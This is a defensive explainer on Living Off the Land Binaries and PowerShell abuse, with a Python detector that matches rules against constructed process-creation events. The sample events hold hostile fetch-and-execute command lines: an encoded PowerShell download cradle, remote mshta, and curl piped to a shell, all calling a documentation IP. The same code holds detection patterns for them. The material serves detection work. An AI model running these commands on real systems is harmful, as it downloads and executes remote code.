
  • Living Off the Land Binaries (LOLBins)

    In the evolving landscape of cybersecurity, attackers are constantly refining their techniques to evade detection. One of the more insidious methods in recent years is the exploitation of Living Off the Land Binaries (LOLBins). These are legitimate binaries or scripts included in operating systems or trusted third-party software that attackers abuse to carry out malicious activities. This article explores what LOLBins are, how they are exploited, and how organizations can defend against these sophisticated attacks.


    What Are LOLBins?

    The term “LOLBins” refers to binaries or scripts that are native to an operating system or part of trusted software packages. These tools are designed for legitimate administrative or operational purposes, such as file management, scripting, or diagnostics. Examples include:

    • Windows: powershell.exe, wscript.exe, cmd.exe, mshta.exe
    • Linux: bash, curl, wget, gcc
    • macOS: osascript, launchctl

    What makes LOLBins attractive is that they are already present on the host and carry the vendor's trust: on Windows they are Microsoft-signed system files, and on Linux and macOS they ship with the operating system or its signed packages. Because they are expected to run, their mere execution rarely triggers an alert in endpoint detection and response (EDR) or antivirus products; detecting abuse has to rest on how they are invoked (command line, parent process, network activity, decoded script content) rather than on what the binary is.


    Why Attackers Use LOLBins

    Attackers favor LOLBins for several reasons:

    1. Trust and Legitimacy
      LOLBins are signed by a trusted vendor and present on every host, so security software has little reason to flag them on sight. Their activity blends into the regular operational noise of a system.
    2. No Need for Additional Payloads
      Using LOLBins minimizes the need for attackers to introduce foreign binaries into a system. A new executable is the artifact most likely to be scanned, hashed, and flagged by security solutions; a script fed to an interpreter that is already on disk is not.
    3. Bypassing Security Controls
      Application whitelisting policies commonly allow everything under the system directories, so a LOLBin runs even where unsigned or unknown executables are blocked. Attackers exploit this by using the allowed binary as the loader or interpreter for their own payload, so the restrictive policy is satisfied while the malicious logic still executes.
    4. Cross-Platform Compatibility
      Some LOLBins, notably scripting engines such as PowerShell (pwsh on Linux and macOS) and Python (commonly present on Linux and macOS), exist across multiple operating systems, giving attackers a consistent toolset. Availability still depends on what is installed: Python is not part of a default Windows install, and pwsh is not part of a default Linux or macOS install.

    Common LOLBins and Their Abuse Techniques

    Below are some examples of popular LOLBins and how attackers exploit them:


    Windows LOLBins

    1. powershell.exe
      PowerShell is a powerful scripting language and shell environment on Windows. It is frequently used in administrative tasks but is also a favorite among attackers due to its extensive capabilities: it can download content, decode and evaluate strings, call .NET APIs, and run with its window hidden and its execution policy bypassed from the command line.
      Exploitation:
      • Fileless malware: Attackers use PowerShell scripts loaded directly into memory to avoid writing malicious files to disk, for example by downloading a script as a string and passing it to Invoke-Expression, or by passing the whole script as a base64-encoded command-line argument.
      • Command-and-control (C2): Attackers use PowerShell for downloading payloads, exfiltrating data, or establishing a persistent C2 connection.
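    The abuse patterns above leave traces in process-creation telemetry even when nothing malicious touches disk. The following Python is an added example for this article, not code from the original page: it runs a small set of rules over constructed process-creation events (Sysmon Event ID 1 style fields, not real logs; the IP address is a documentation address) and decodes PowerShell -EncodedCommand arguments before matching, so a download cradle hidden behind base64 is still caught. The rule names and the set of rules are this example's own choices, not a published ruleset. It also covers the Linux and macOS binaries listed earlier in the article (curl piped into a shell, osascript shelling out), not only powershell.exe.

```python
import base64
import re

# Constructed process-creation events (Sysmon Event ID 1 style). These are
# samples made up for this example, not real telemetry; 198.51.100.7 is a
# documentation address.
_DECODED_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.ps1')"
# powershell.exe -EncodedCommand takes base64 of the UTF-16LE script text.
_ENCODED_CRADLE = base64.b64encode(_DECODED_CRADLE.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {   # PowerShell launched by Word, window hidden, script passed encoded
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CommandLine": f"powershell.exe -NoP -W Hidden -Enc {_ENCODED_CRADLE}",
    },
    {   # mshta pulling an HTA from a remote host
        "Image": r"C:\Windows\System32\mshta.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": "mshta.exe http://198.51.100.7/launch.hta",
    },
    {   # Windows Script Host spawned directly by Excel
        "Image": r"C:\Windows\System32\wscript.exe",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
        "CommandLine": r"wscript.exe //B C:\Users\Public\update.vbs",
    },
    {   # Linux: curl piped straight into bash from a cron job
        "Image": "/usr/bin/bash",
        "ParentImage": "/usr/sbin/cron",
        "CommandLine": 'bash -c "curl -fsSL http://198.51.100.7/i.sh | bash"',
    },
    {   # macOS: osascript escaping to a shell
        "Image": "/usr/bin/osascript",
        "ParentImage": "/bin/zsh",
        "CommandLine": "osascript -e 'do shell script \"curl http://198.51.100.7/x | sh\"'",
    },
    {   # Benign administrative PowerShell; should produce no finding
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell.exe -Command Get-Service -Name Spooler",
    },
]

OFFICE_APPS = r"^(winword|excel|powerpnt|outlook)\.exe$"
POWERSHELL = r"^(powershell|pwsh)(\.exe)?$"

# Hypothetical rules for this example: (name, image basename regex,
# command-line regex or None, parent basename regex or None). Regexes are
# matched case-insensitively; None means "no constraint".
RULES = [
    ("powershell_encoded_command", POWERSHELL,
     r"-(e|ec|en|enc|encoded|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", None),
    ("powershell_download_cradle", POWERSHELL,
     r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", None),
    ("powershell_from_office", POWERSHELL, None, OFFICE_APPS),
    ("mshta_remote_content", r"^mshta\.exe$", r"https?://|javascript:|vbscript:", None),
    ("script_host_from_office", r"^(wscript|cscript)\.exe$", None, OFFICE_APPS),
    ("download_piped_to_shell", r"^(sh|bash|zsh|dash)$",
     r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b", None),
    ("osascript_shell_escape", r"^osascript$", r"do shell script", None),
]

ENCODED_RE = re.compile(r"-(?:e|ec|en|enc|encoded|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


def decode_encoded_command(command_line):
    """Plaintext of a -EncodedCommand argument (base64 of UTF-16LE), or '' if absent/invalid."""
    m = ENCODED_RE.search(command_line)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError: bad padding or alphabet
        return ""


def analyze_event(event):
    """Names of the rules matched by one event, in RULES order.

    The encoded command is decoded first and appended to the text that the
    rules see, so plaintext rules (e.g. the download cradle) fire on it too.
    """
    image = basename(event["Image"])
    parent = basename(event.get("ParentImage", ""))
    haystack = event["CommandLine"] + "\n" + decode_encoded_command(event["CommandLine"])
    hits = []
    for name, image_re, cmd_re, parent_re in RULES:
        if (re.search(image_re, image, re.I)
                and (cmd_re is None or re.search(cmd_re, haystack, re.I))
                and (parent_re is None or re.search(parent_re, parent, re.I))):
            hits.append(name)
    return hits


def analyze(events):
    """Map event index -> matched rule names, omitting events with no finding."""
    return {i: hits for i, ev in enumerate(events) if (hits := analyze_event(ev))}


if __name__ == "__main__":
    for idx, rules in analyze(SAMPLE_EVENTS).items():
        ev = SAMPLE_EVENTS[idx]
        print(f"event {idx}: {basename(ev['Image'])} <- {basename(ev['ParentImage'])}: {', '.join(rules)}")
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded:
            print(f"    decoded: {decoded}")
```

    The first event is the interesting one: on the raw command line only the encoded-command rule matches, but once the argument is decoded the download-cradle rule fires as well, and the Office parent adds a third signal. The last event (an administrator querying a service from Explorer) produces nothing, which is the point of keying rules on invocation context rather than on the binary name alone.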
      Example: